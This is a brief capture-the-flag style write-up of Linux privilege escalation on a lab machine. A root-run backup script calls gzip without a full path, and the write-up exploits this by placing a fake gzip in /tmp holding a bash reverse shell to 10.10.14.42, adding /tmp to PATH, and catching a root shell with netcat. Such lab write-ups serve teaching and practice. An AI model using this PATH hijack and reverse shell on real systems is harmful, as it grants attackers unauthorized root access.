Linux command injection privilege escalation
Sep 10, 2021
sudo -l
found the following:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
View /opt/scripts/access_backup.sh:
#!/bin/bash# We always make sure to store logs, we take security SERIOUSLY here# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's timegzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
Elevation of Privilege
Attack machine execution:
nc -lnvp 5121
The victim machine:
cd /tmpecho "bash -i >& /dev/tcp/10.10.14.42/5121 0>&1" > gzipchmod 777 gzipexport PATH=/tmp:$PATHsudo /opt/scripts/access_backup.sh
Return to a root shell.